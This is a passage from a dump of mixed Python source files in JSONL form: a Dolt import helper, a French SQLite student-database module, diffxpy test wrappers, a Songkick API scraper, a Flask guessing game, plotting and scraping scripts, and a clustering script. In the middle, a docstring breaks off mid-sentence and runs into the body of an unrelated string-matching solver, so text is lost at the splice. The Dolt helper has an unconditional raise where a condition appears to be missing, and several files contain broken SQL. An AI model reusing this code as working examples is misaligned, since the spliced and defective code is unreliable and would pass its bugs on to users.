to\n 127.0.0.1:3306.\n\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :param batch_size:\n :return:\n \"\"\"\n assert import_mode in [UPDATE, CREATE]\n\n # Grab some basic information about the data\n assert data, 'Cannot provide an empty dictionary'\n row_count = len(list(data.values())[0])\n assert row_count > 0, 'Must provide at least a single row'\n assert all(len(val_list) == row_count for val_list in data.values()), 'Must provide value lists of uniform length'\n\n # Get an Engine object\n\n # If the table does not exist, create it using type inference to build a create statement\n if import_mode == CREATE:\n assert primary_keys, 'primary_keys need to be provided when inferring a schema'\n _create_table_inferred(repo, table_name, data, primary_keys)\n\n rows = []\n for i in range(row_count):\n rows.append({col: data[col][i] for col in data.keys()})\n\n logger.info('Inserting {row_count} rows into table {table_name}'.format(row_count=row_count,\n table_name=table_name))\n table = MetaData(bind=repo.engine, reflect=True).tables[table_name]\n for i in range(max(1, math.ceil(len(rows) / batch_size))):\n batch_start = i * batch_size\n batch_end = min((i+1) * batch_size, len(rows))\n batch = rows[batch_start:batch_end]\n logger.info('Writing records {} through {} of {} rows to Dolt'.format(batch_start, batch_end, len(rows)))\n with repo.engine.connect() as conn:\n conn.execute(table.insert(), batch)\n\n\ndef _create_table_inferred(repo: Dolt, table_name: str, data: Mapping[str, List[Any]], primary_keys: List[str]):\n # generate and execute a create table statement\n cols_to_types = {}\n for col_name, list_of_values in data.items():\n # Just take the first value to by the type\n first_non_null = None\n for val in list_of_values:\n if val is not None:\n first_non_null = val\n break\n raise ValueError('Cannot provide an empty list, types cannot be inferred')\n cols_to_types[col_name] = _get_col_type(first_non_null, list_of_values)\n\n metadata = MetaData(bind=repo.engine)\n table = _get_table_def(metadata, table_name, cols_to_types, primary_keys)\n table.create()\n\n\ndef _get_col_type(sample_value: Any, values: Any):\n if type(sample_value) == str:\n return String(2 * max(len(val) for val in values))\n elif type(sample_value) == int:\n return Integer\n elif type(sample_value) == float:\n return Float\n elif type(sample_value) == datetime:\n return DateTime\n else:\n raise ValueError('Value of type {} is unsupported'.format(type(sample_value)))\n\n\ndef _get_table_def(metadata, table_name: str, cols_with_types: Mapping[str, str], pks: List[str]):\n columns = [Column(col_name, col_type, primary_key=col_name in pks)\n for col_name, col_type in cols_with_types.items()]\n return Table(table_name, metadata, *columns)\n\n\ndef import_list(repo: Dolt,\n table_name: str,\n data: List[Mapping[str, Any]],\n primary_keys: List[str] = None,\n import_mode: str = None,\n batch_size: int = DEFAULT_BATCH_SIZE):\n \"\"\"\n This provides a write interface for writing row major Python data structures to Dolt. The data parameter should be a\n list of dicts, where each dict represents a row. Each dict must have the same columns, and:\n - values that match the type of the table in the schema of the table being written to\n - values of the same type that can be coalesced to a Python type by the (very limited) type inference logic\n for generating a schema from a data structure.\n\n Let's proceed with the example of creating a simple table and showing how to write some data structures:\n CREATE TABLE players (id INT, name VARCHAR(16), PRIMARY KEY (id))\n\n Now write in update mode:\n >>> list_of_dicts = [{'id': 1, 'name': 'Roger'}, {'id': 2, 'name': 'Rafael'}]\n >>> import_list(repo, 'players', list_of_dicts, import_mode='update')\n\n Alternatively we can let the Python code infer a schema\n >>> import_list(repo, 'players', list_of_dicts, ['id'], import_mode='create')\n\n Note some restrictions (which we should loosen in a future release):\n - all dicts must have the same set of columns, and they must be a strict subset of the table's columns\n - when inferring a schema the type inference is very limited, and all values that correspond to a given key\n must be of the same type\n - when inferring a schema we cannot have a column of null values since no schema can be inferred\n\n This function requires the Dolt SQL server to be running on the host and port provided, defaulting to\n 127.0.0.1:3306.\n\n :param repo:\n :param table_name:\n :param data:\n :param primary_keys:\n :param import_mode:\n :param batch_size:\n :return:\n \"\"\"\n assert data, 'Cannot provide empty dict'\n\n reformatted = {}\n cols = set(data[0].keys())\n\n logger.info('Reshaping data into columns')\n for row in data:\n assert set(row.keys()) == cols, 'Two rows with different keys found'\n\n for col_name, value in row.items():\n if col_name in reformatted:\n reformatted[col_name].append(value)\n else:\n reformatted[col_name] = [value]\n\n import_dict(repo, table_name, reformatted, primary_keys, import_mode, batch_size)\n","sub_path":"doltpy/core/write/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":11163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"36194593","text":"\nfrom connection import create_connection,create_table\n\nnew_conn = create_connection(\"GestionFormaton.db\")\n\nif new_conn is None:\n raise Exception(\"Error! cannot create the database connection.\")\n\nsql_create_tables = \"\"\" CREATE TABLE \"Cursus\" (\n \"idCursus\"\tINTEGER NOT NULL,\n \"nomCursus\"\tTEXT NOT NULL,\n PRIMARY KEY(\"idCursus\" AUTOINCREMENT)\n );\n CREATE TABLE \"Etudiant\" (\n \"idEtudiant\"\tINTEGER NOT NULL,\n \"nomEtudiant\"\tTEXT NOT NULL,\n \"prenomEtudiant\"\tTEXT NOT NULL,\n \"age\"\tINTEGER NOT NULL,\n \"idCursus\"\tINTEGER,\n PRIMARY KEY(\"idEtudiant\" AUTOINCREMENT),\n FOREIGN KEY(\"idCursus\") REFERENCES \"Cursus\"(\"idCursus\")\n );\n CREATE TABLE \"Matiere\" (\n \"idMatiere\"\tINTEGER NOT NULL,\n \"nomMatiere\"\tTEXT NOT NULL,\n PRIMARY KEY(\"idMatiere\" AUTOINCREMENT)\n );\n CREATE TABLE \"Matiere_Cursus\" (\n \"idMatiere\"\tINTEGER NOT NULL,\n \"idCursus\"\tINTEGER NOT NULL,\n FOREIGN KEY(\"idMatiere\") REFERENCES \"Matiere\"(\"idMatiere\"),\n FOREIGN KEY(\"idCursus\") REFERENCES \"Cursus\"(\"idCursus\"),\n PRIMARY KEY(\"idMatiere\",\"idCursus\")\n );\"\"\"\ncreate_table(new_conn,sql_create_tables)\n\n\n#\"#### 1) Add Data ##########################################\"\"\"\n\n\n\ndef ajouterMatiere(conn,nomMatiere):\n sql = ''' INSERT INTO Matiere(nomMatiere)\n VALUES(?) '''\n cur = new_conn.cursor()\n cur.execute(sql, nomMatiere)\n conn.commit()\n return cur.lastrowid\n\ndef ajouterCursus(conn,nomCursus):\n sql = ''' INSERT INTO Cursus(nomCursus)\n VALUES(?) '''\n cur = conn.cursor()\n cur.execute(sql, nomCursus)\n conn.commit()\n return cur.lastrowid\n\ndef ajouterEtudiant(conn,etudiant):\n\n sql = ''' INSERT INTO Etudiant(nomEtudiant,prenomEtudiant,age)\n VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.execute(sql, etudiant)\n conn.commit()\n return cur.lastrowid\n\ndef lierCursusMatiere(conn,matieres_cursus):\n\n sql = ''' INSERT INTO students VALUES(?,?,?) '''\n cur = conn.cursor()\n cur.executemany(sql,matieres_cursus)\n conn.commit()\n return cur.lastrowid\n\n\n\n#\"#### 2) Select Data ##########################################\"\"\"\n\ndef listerMatieres(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Matiere\")\n\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)\n\ndef listerCursus(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Cursus\")\n\n rows = cur.fetchall()\n\n for cursus in rows:\n print(cursus)\n\n\ndef listerEtudiant(conn):\n \n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Matiere\")\n\n rows = cur.fetchall()\n\n for etud in rows:\n print(etud)\n\n#\"#### 3) Modify Data ##########################################\"\"\"\n\ndef modifierMatiere(conn,newMatiere):\n if(newMatiere['id'] is not None and newMatiere['nomMatiere'] is not None):\n sql = ''' UPDATE Matiere\n SET nomMatiere = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newMatiere['nomMatiere'],newMatiere['id']))\n conn.commit()\n\ndef modifierCursus(conn,newCursus):\n if(newCursus['id'] is not None and newCursus['nomCursus'] is not None):\n sql = ''' UPDATE Cursus\n SET nomCursus = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newCursus['nomMatiere'],newCursus['id']))\n conn.commit()\n\ndef modifierEtudiant(conn,newEtudiant):\n if(newEtudiant['id'] is not None and newEtudiant['row'] is not None):\n sql = ''' UPDATE Etudiant\n SET nomEtudiant = ?,\n prenomEtudiant = ?,\n age = ?,\n WHERE id = ?'''\n cur = conn.cursor()\n cur.execute(sql,(newEtudiant['row'],newEtudiant['id']))\n conn.commit()\n\n\n#\"#### 4) Delete Data ##########################################\"\"\"\n\ndef supprimerMatiere(conn,idMatiere):\n sql = 'DELETE FROM Matiere WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (idMatiere,))\n conn.commit()\n\ndef supprimerCursus(conn,idCursus):\n sql = 'DELETE FROM Cursus WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (idCursus,))\n conn.commit()\n\ndef supprimerEtudiant(conn,idEtudiant):\n sql = 'DELETE FROM Etudiant WHERE id=?'\n cur = conn.cursor()\n cur.execute(sql, (idEtudiant,))\n conn.commit()\n\ndef afficherEtudiantDeCursus(conn,nomCursus):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Etudiant e where e.idCursus = (Select idCursus from Cursus c where c.nomCursus = ?)\", nomCursus)\n\n rows = cur.fetchall()\n for etud in rows:\n print(etud)\n\n \ndef afficherMatiereCursus(conn,nomMatiere):\n cur = conn.cursor()\n cur.execute(\"SELECT c.nomCursus FROM Cursus c join Matiere_Cursus mc on mc.idCursus=c.idCursus join Matiere m on mc.idMatiere = m.idMatiere where c.nomCursus = ?)\", nomCursus)\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)\n\ndef afficherCursus(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT c.nomCursus FROM Cursus c where c.idCursus not in (select idCursus from matiere_cursus))\")\n rows = cur.fetchall()\n\n for matiere in rows:\n print(matiere)","sub_path":"jour3/modulebdd.py","file_name":"modulebdd.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"423171887","text":"import numpy as np\nfrom joblib import Parallel, delayed\nimport diffxpy.api as de\n\nfrom ..log import setup_logger\nfrom ..utils.validation import _validate_n_jobs\nfrom ._ttest_de import _ttest_differential_expression\nfrom ._unit import Unit\n\n\nclass DE_TTest(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('TTest')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running TTest\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.t_test(\n data=x,\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n is_logged=is_logged\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_Rank(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Rank')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Rank Test\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.rank_test(\n data=x,\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n is_logged=is_logged\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_LRT(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Likelihood Ratio')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Likelihood Ratio Test\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.two_sample(\n data=x,\n test='lrt',\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n noise_model='nb'\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_Wald(Unit):\n def __init__(self, alpha=0.05, max_n_genes=50, **kwargs):\n self.logger = setup_logger('Wald')\n self.alpha = alpha\n self.max_n_genes = max_n_genes\n self.kwargs = kwargs\n\n def get(self, x, indices, is_logged=True):\n \"\"\"\n indices vs rest\n \"\"\"\n self.logger.info(\"Running Wald Test. This may take some time.\")\n\n grouping = np.zeros(shape=(x.shape[0],), dtype=int)\n grouping[indices] = 1\n\n test = de.test.two_sample(\n data=np.exp(x),\n test='wald',\n grouping=grouping,\n gene_names=np.arange(x.shape[1]),\n noise_model='nb'\n )\n\n test = test.summary(qval_thres=self.alpha, fc_upper_thres=1)\n test = test.drop('gene', axis=1)\n test = test.sort_values(by='log2fc', ascending=False)\n test = test[:self.max_n_genes]\n\n return test\n\n\nclass DE_TTest_Cellar(Unit):\n \"\"\"\n One-vs-all T-Test.\n\n Two sided test for the null H_0: The two populations have the same average.\n If the p-value is small (= 0 and t [m].isdigit ():\n return fn (n, m - 1)\n return False\n elif m < 0: return False\n if s [n] == t [m]: return fn (n - 1, m - 1)\n elif t [m].isdigit ():\n val = int (t [m])\n for sz in range (val + 1):\n if fn (n - sz, m - 1): return True\n return False\n # memoized version\n '''dl = [bytearray ([2 for j in range (tl + 11)]) for i in range (sl + 11)]\n def fn (n, m):\n if dl [n][m] != 2: return dl [n][m]\n if n < 0 and m < 0: return 1\n elif n < 0:\n if m >= 0 and t [m].isdigit (): return fn (n, m - 1)\n dl [n][m] = 0; return 0\n elif m < 0: dl [n][m] = 0; return 0\n if s [n] == t [m]: return fn (n - 1, m - 1)\n elif t [m].isdigit ():\n val = int (t [m])\n for sz in range (val + 1):\n if fn (n - sz, m - 1): return 1\n dl [n][m] = 0; return 0'''\n if fn (sl - 1, tl - 1): print ('YES')\n else: print ('NO')\n\nif __name__ == \"__main__\": main ()","sub_path":"_string_transformation2.py","file_name":"_string_transformation2.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236979291","text":"import time\n# 4kjyu\nstart_time = time.time()\n\n\ndef range(args):\n res = []\n final_res = []\n store_res = []\n i = 0\n for ele in args:\n print(\"this is every ele\", ele)\n is_running = True\n if ele in store_res:\n continue\n else:\n while is_running:\n\n if ele + i in args:\n res.append(str(ele + i))\n store_res.append(ele + i)\n else:\n print('This store res', store_res)\n print(\"res\", res)\n if len(res) >= 3:\n store = res[0] + '-' + res[len(res) - 1]\n final_res.append(store)\n else:\n del store_res[len(store_res) - 1]\n final_res.append(str(ele))\n i = 0\n res = []\n print(final_res)\n break\n i += 1\n\n print(final_res)\n\n\nrange([-3, -2, -1, 2, 10, 15, 16, 18, 19, 20])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","sub_path":"sokheng_codewar/04_range.py","file_name":"04_range.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"24715724","text":"#!/usr/bin/python3\n\nimport sys\nimport time\nimport datetime\nimport json\nimport logging\nfrom pprint import pprint \nimport requests\nfrom pymongo import MongoClient\nimport pymongo\nfrom key import API_KEY\nfrom ratelimit import RateLimited\n\nARTIST_SEARCH_URL = \"http://api.songkick.com/api/3.0/search/artists.json\"\nGIGOGRAPHY_SEARCH_URL = \"http://api.songkick.com/api/3.0/artists/{artist_id}/gigography.json?\"\nREQUESTS = 1.0\nSECONDS = 10.0\nRATE = REQUESTS/SECONDS\n\nDEBUG = False\nLOGGER = logging.getLogger(__name__)\n\n#Function: saveArtist\n# Saves a Songkick API artist document as is\ndef saveArtist(db, data):\n data[\"_id\"] = data[\"id\"]\n artists = db.artists\n try:\n LOGGER.info(\"Attempting to save artist with id: %s\", data[\"id\"])\n if not DEBUG:\n artists.insert_one(data)\n LOGGER.info(\"Successfully saved artist with id: %s\", data[\"id\"])\n else:\n LOGGER.info(\"DEBUG: Bypassed saving artist with id: %s\", data[\"id\"])\n except pymongo.errors.DuplicateKeyError as e:\n LOGGER.error(\"DuplicateKeyError when saving aritst with id: %s\", data[\"id\"])\n\n \n\n#Function: saveEvent\n# Saves a Songkick API event document as is\ndef saveEvent(db, data):\n data[\"_id\"] = data[\"id\"]\n events = db.events\n try:\n LOGGER.info(\"Attempting to save event with id: %s\", data[\"id\"])\n if not DEBUG:\n events.insert_one(data)\n LOGGER.info(\"Successfully saved event with id: %s\", data[\"id\"])\n else:\n LOGGER.info(\"DEBUG: Bypassed saving event with id: %s\", data[\"id\"])\n except pymongo.errors.DuplicateKeyError as e:\n LOGGER.error(\"DuplicateKeyError when saving event with id: %s\", data[\"id\"])\n \n\n#Function: requestArtist \n# Performs an artist search to return id and related fields.\n# Returns false if empty search result\n@RateLimited(RATE)\ndef requestArtist(name):\n LOGGER.info(\"Requesting Artist for: %s\", name)\n payload = {\"apikey\": API_KEY, \"query\": name}\n r = requests.get(ARTIST_SEARCH_URL, params=payload)\n j = r.json()\n if j['resultsPage']['results']:\n LOGGER.info(\"Successfully received Artist data for: %s\", name)\n return j['resultsPage']['results']['artist'][0]\n else:\n LOGGER.error(\"Did not successfully receive artist data for: %s\", name)\n LOGGER.error(\"JSON dump: %s\", j)\n return False\n\n#Function: requestArtist \n# Returns one page of an artists gigography\n# Returns false if reached last page\n@RateLimited(RATE)\ndef requestGigography(id, page):\n LOGGER.info(\"Requesting Gigography for: %s with Page: %s\", id, page)\n payload = {\"apikey\": API_KEY, \"page\": page}\n target = GIGOGRAPHY_SEARCH_URL.format(artist_id=id)\n r = requests.get(target, params=payload)\n j = r.json()\n if j['resultsPage']['results']:\n LOGGER.info(\"Successfully received Gigography for: %s with Page: %s\", id, page)\n return j['resultsPage']['results']['event']\n else:\n LOGGER.error(\"Did not successfully receive Gigography data for: %s page %s\", id, page)\n LOGGER.error(\"JSON dump: %s\", j)\n return False\n\n#Function: getAllArtists\n# Takes a list of artist names, searches for artists, saves each entry and returns list of ids\ndef getAllArtists(db, artists):\n ids = list()\n for x in artists:\n data = requestArtist(x)\n if data:\n ids.append(data['id'])\n saveArtist(db, data)\n LOGGER.info(\"Finished getting all artist profiles from Songkick Search API.\")\n return ids\n\n#Function: getAllGigographies\n#Iterates over a list of artist ids, gets all gigographies by iterating thru pages and saving each event\ndef getAllGigographies(db, artist_ids):\n event_ids = list()\n for x in artist_ids:\n page = 1 \n while True:\n data = requestGigography(x, page)\n if not data:\n break\n for e in data:\n saveEvent(db, e)\n event_ids.append(e['id'])\n page += 1\n LOGGER.info(\"Finished getting all gigographies from Songkick Events API.\")\n return event_ids\n\n#Function: readArtistsFromFile\n# Reads in .txt file from command line.\n# Creates array of strings that are used to perform the artist lookup.\ndef readArtistsFromFile():\n artists = list()\n filename = sys.argv[1]\n with open(filename, 'r') as f:\n for artist in f:\n artist = artist.rstrip()\n artists.append(artist)\n return artists\n\n#Function: checkArgs\n# Checks for textfile with artists names.\ndef checkArgs():\n if len(sys.argv) < 2:\n print(\"Error: missing artsts.txt\")\n sys.exit()\n if len(sys.argv) is 3:\n global DEBUG \n DEBUG = True\n print(\"DEBUG MODE ENABLED\")\n\ndef initLogger():\n global LOGGER\n LOGGER.setLevel(logging.DEBUG)\n stamp = str(int(time.time()))\n filename = 'log/SONGKICK_API_{}.log'\n handler = logging.FileHandler(filename.format(stamp))\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n\n\ndef main():\n checkArgs()\n initLogger()\n client = MongoClient()\n db = client.concert_viz\n names = readArtistsFromFile()\n ids = getAllArtists(db, names)\n event_ids = getAllGigographies(db, ids)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"data/songkickScraper.py","file_name":"songkickScraper.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"520646140","text":"from flask import Flask\nimport random\napp = Flask(__name__)\n\nrandom_number = random.randint(0, 10)\n\n@app.route('/')\ndef hello():\n return '

Guess a number between 0 and 9

' \\\n ''\n\n\n@app.route('/')\ndef guess_page(guess):\n if guess > random_number:\n return \"

Too high, try again!

\" \\\n \"\"\n\n elif guess < random_number:\n return \"

Your guess is too low, try again!

\" \\\n \"\"\n\n else:\n return \"

You are right! This is the number!

\" \\\n \"\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"438515441","text":"# 10. Write a Python program to create bar plot of scores by group and gender.\n# Use multiple X values on the same chart for men and women.\n# Sample Data:\n# Means (men) = (22, 30, 35, 35, 26)\n# Means (women) = (25, 32, 30, 35, 29)\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom Week4.Matplotlib.Utility.utility import UtilityClass\n\n\nclass Gender:\n\n # creates utility class object\n utility_obj = UtilityClass()\n\n def Multi_bar(self):\n # create no.of groups\n print(\"how many groups do u wanna create\")\n n_groups = self.utility_obj.accept_size()\n # accepts men data\n print(\"enter men means\")\n men_means = self.utility_obj.CreateList(n_groups)\n # accepts women data\n print(\"enter women means\")\n women_means = self.utility_obj.CreateList(n_groups)\n\n # create plot or creates object of subplot\n fig, ax = plt.subplots()\n\n index = np.arange(n_groups)\n bar_width = 0.35\n\n # plotting men means values to create bar chart\n plt.bar(index, men_means, bar_width, color='g', label='Men')\n\n # plotting women means values to create bar chart\n plt.bar(index + bar_width, women_means, bar_width, color='r', label='Women')\n\n # Set the x axis label\n plt.xlabel('Person')\n\n # Set the y axis label\n plt.ylabel('Scores')\n\n # Sets a title\n plt.title('scores by group and gender')\n\n # group label\n plt.xticks(index + bar_width, ('G1', 'G2', 'G3', 'G4', 'G5'))\n\n # show a legend on the plot\n plt.legend()\n\n # Display a figure.\n plt.show()\n\n\n# creates class object\nobj = Gender()\n# calling method by using class object\nobj.Multi_bar()","sub_path":"Week4/Matplotlib/Barchart/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356039843","text":"#coding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport bs4\ndef getHTMLText(url):\n try:\n r = requests.get(url,timeout = 30)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n return r.text\n except:\n return \"Here raises an error.\"\n return \"\"\n\ndef fullUnivList(ulist,html):\n soup = BeautifulSoup(html, \"html.parser\")\n for tr in soup.find('tbody').children: #可能出现字符串类型,但是信息都封装在tag里,所以需要过滤掉string\n if isinstance(tr,bs4.element.Tag): #需要import bs4库\n tds = tr('td')\n ulist.append([tds[0].string, tds[1].string,tds[3].string]) #增加大学中的不同属性\n\n # pass #单独定义一个空函数是会报错的,使用pass进行占位\n\ndef printUnivList(ulist,num):\n tplt = \"{0:^10}\\t{1:{3}^10}\\t{2:^10}\"\n print(tplt.format(\"排名\",\"学校名称\",\"分数\",chr(12288))) #chr(12288)是中文字符的填充空格\n for i in range(num):\n u = ulist[i]\n print(tplt.format(u[0],u[1],u[2],chr(12288)))\n\ndef main():\n uinfo = []\n url = 'http://www.zuihaodaxue.cn/zuihaodaxuepaiming2016.html'\n html = getHTMLText(url)\n fullUnivList(uinfo,html)\n printUnivList(uinfo,100) #数字代表多少学校的信息\n\nif __name__ == '__main__':\n main()","sub_path":"python_scrapy/second_week/daxuepaiming.py","file_name":"daxuepaiming.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232602307","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'blog'\nurlpatterns = [\n path('', views.PostListView.as_view(), name='home'),\n path('post//', views.PostDetailView.as_view(), name='detail'),\n# path('post/create/', views.create_post, name='create'),\n path('post/create/', views.PostCreateView.as_view(), name='create'),\n path('login/', auth_views.LoginView.as_view(template_name='blog/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='blog/logout.html'), name='logout'),\n# path('register/', views.register, name='register'),\n path('register/', views.UserRegisterView.as_view(), name='register'),\n path('post//update/', views.PostUpdateView.as_view(), name='update'),\n# path('post//update2/', views.post_update, name='update2'),\n path('post//delete/', views.delete_post, name='delete'),\n path('post//delete2/', views.PostDeleteView.as_view(), name='delete2'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"182397005","text":"#!/usr/bin/env python3\nimport sqlite3 as lite\nfrom os.path import exists\n\nclass DataBase(object):\n \"\"\"\n Object to connect to a database,\n When not exists, it will create the file and structure\n \"\"\"\n def __init__(self, path):\n \"\"\"\n path = path to location where file should be\n \"\"\"\n created = exists(path)\n # create connection\n self.con = lite.connect(path)\n \n if not created:\n self.create_structure()\n self.id = 0\n else:\n cur = self.con.cursor()\n cur.execute(\"SELECT MAX(id) from Posts\")\n self.id = cur.fetchone()[0]\n if not self.id: self.id = 0 \n\n self.postbuffer = []\n self.acbuffer = []\n\n def __insert(self, sql, values):\n with self.con:\n try:\n cur = self.con.cursor()\n cur.executemany(sql, values)\n except lite.Error:\n if self.con:\n self.con.rollback()\n raise\n \n def create_structure(self):\n with self.con:\n cur = self.con.cursor()\n # posts table\n cur.execute(\n \"\"\"\n CREATE TABLE Posts(\n id INTEGER PRIMARY KEY,\n month INTEGER,\n year INTEGER,\n author TEXT,\n postno INTEGER\n )\"\"\"\n )\n cur.execute(\n \"\"\"\n CREATE TABLE Aircraft(\n post INTEGER,\n name TEXT,\n FOREIGN KEY(post) REFERENCES Posts(rowid)\n )\n \"\"\"\n )\n\n def flush(self):\n if self.postbuffer:\n self.__insert(\n \"INSERT INTO Posts VALUES(?,?,?,?,?)\",\n self.postbuffer\n )\n self.__insert(\n \"INSERT INTO Aircraft VALUES(?,?)\",\n self.acbuffer\n )\n self.postbuffer = []\n self.acbuffer = []\n \n def insert_post(self, month, year, author, postno, aircraft):\n \"\"\"\n aircraft = list of aircraft names\n returns 0 if not inserted\n returns id of post if inserted\n \"\"\"\n if not aircraft:\n # ignore the ones without aircraft names\n return\n else:\n self.id += 1\n self.postbuffer.append(\n (self.id, int(month), int(year), author, int(postno))\n )\n self.acbuffer += [ (self.id, a) for a in aircraft ]\n if len(self.postbuffer) >= 50000:\n self.flush()\n\n","sub_path":"ww2crawler/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"394207621","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 10 15:43:34 2020\r\nMicro and Macro data stream clustering\r\n\r\n@author: neshragh\r\n\"\"\"\r\n\r\nfrom sklearn.cluster import AffinityPropagation\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\nimport datetime\r\nimport os\r\n\r\n\r\n##################################################################\r\n\"\"\"\r\nStage 1: Micro Clustering: based on original dataset and Affinity propagation algorithm\r\nNumber of Clusters can vary based on the damping factor\r\n\r\n\"\"\"\r\n\r\n#delete the prev csv file created from the last run\r\nif os.path.exists('micro_cluster_data.csv'):\r\n os.remove(\"micro_cluster_data.csv\")\r\nif os.path.exists('macro_cluster_data.csv'):\r\n os.remove(\"macro_cluster_data.csv\")\r\n \r\n##open a dataset\r\ndf_dat = pd.read_csv('week4event.csv')\r\n\r\n \r\n# =============================================================================\r\n# str = input(\"Enter start Date(Format:mm/dd/yyyy): \")\r\n# end = input(\"Enter End Date(Format:mm/dd/yyyy): \")\r\n# =============================================================================\r\n\r\ndf_dat['Date'] = pd.to_datetime(df_dat['Date'], format='%m/%d/%Y')\r\n\r\n#dtrang = df_dat.loc[(df_dat.Date >= '2019-05-08') & (df_dat.Date <= '2019-05-10')]\r\n\r\n#dtrang= df_dat[(df_dat['Date'] == '2019-05-10')]\r\ndtrang= df_dat[(df_dat['Date']>datetime.date(2019,4,29)) & (df_dat['Date']= '4/29/2019') &(df_dat['Date'] < '5/1/2019')\r\n#print(df_dat['Date'][5] )\r\n\r\n# =============================================================================\r\n# start_date = pd.to_datetime('05-02-2019')\r\n# e_date = pd.to_datetime('05-03-2019')\r\n# \r\n# for j in pd.date_range(start_date,e_date):\r\n# print(j)\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# fname = input(\"Enter start time: \")\r\n# fdamping = input(\"Enter Damping Factor Value for Micro clusters(BETWEEN 0.5-0.99): \")\r\n# =============================================================================\r\n\r\nhrstrng = '7:00:00'\r\ngg=hrstrng\r\n#hrstrng = gg = 7\r\n#fname\r\n\r\nfor i in range(7,19):\r\n print(str(i))\r\n hrstrng = str(i) + ':00:00'\r\n nhr = str(i+1) + ':00:00'\r\n\r\n# =============================================================================\r\n# hrstrng = hrstrng.replace(hrstrng[0:2],format(i,'02d'))\r\n# nhr = 